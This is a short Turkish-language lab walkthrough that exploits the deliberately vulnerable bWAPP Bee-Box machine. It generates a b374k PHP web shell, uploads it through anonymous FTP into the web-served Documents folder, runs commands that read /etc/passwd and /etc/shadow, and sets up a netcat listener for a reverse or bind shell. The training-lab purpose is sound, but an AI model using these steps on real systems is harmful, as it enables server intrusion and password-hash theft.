Not: Yazıda kullanılan Bee-Box sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/
Bu yazıda istismar edilecek olan WebDAV zafiyetini istismar etmek için Documents dizini altına dosya yüklenecektir.
Bu amaçla internetten indirilen B374K zararlı PHP uygulaması kullanılabilir.
git clone https://github.com/b374k/b374k.git
ls -la b374k/
cd b374k/
php –f index.php — -o zararli.php –p Parola123
Hazırlanan dosya içeriği aşağıdaki gibidir.
ls -la zararli.php
head -10 zararli.php
tail -10 zararli.php
Zafiyetli uygulamayı barındıran sunucuda anonim FTP servisi hizmet vermektedir. Bu servise erişildiğinde Documents sayfası altındaki dosyaların listelendiği görülmektedir. Bu dizine yazma yetkisinin de olduğu ve hazırlanan zararlı PHP dosyasının yüklenebildiği görülmektedir.
ftp 10.10.2.130
anonymous
HerhangiBirParola
put zararli.php zararli-sayfa.php
ls -la
Böylece yüklenen dosya web üzerinden listelenmektedir.
http://10.10.2.130/bWAPP/documents/
Yüklenen sayfaya girildiğinde çıkan ekranda bir bilgi istenmektedir. Belirlenen parola değeri (“Parola123”) girilir.
Açılan sayfada web uygulaması (www-data) yetkileri ile dosya listeleme, komut satırında komut çalıştırma, PHP fonksiyonlarını çalıştırma, network bağlantısı kurma,… işlemleri gerçekleştirilebilir.
id; uname -a; head -3 /etc/passwd
cat /etc/shadow
Network sekmesi ile çeşitli yöntemlerle (Bind Shell, Reverse Shell, Simple Packet Crafter) bağlantı elde edilebilir.
nc -l -v -p 13579
Böylece “nc” ile komut satırı erişimi de elde edilmiş olur.
hostname
id
Kaynak:
https://paulsec.github.io/blog/2014/04/21/bwapp-write-up/
https://www.youtube.com/watch?v=AMxW-VI3SgY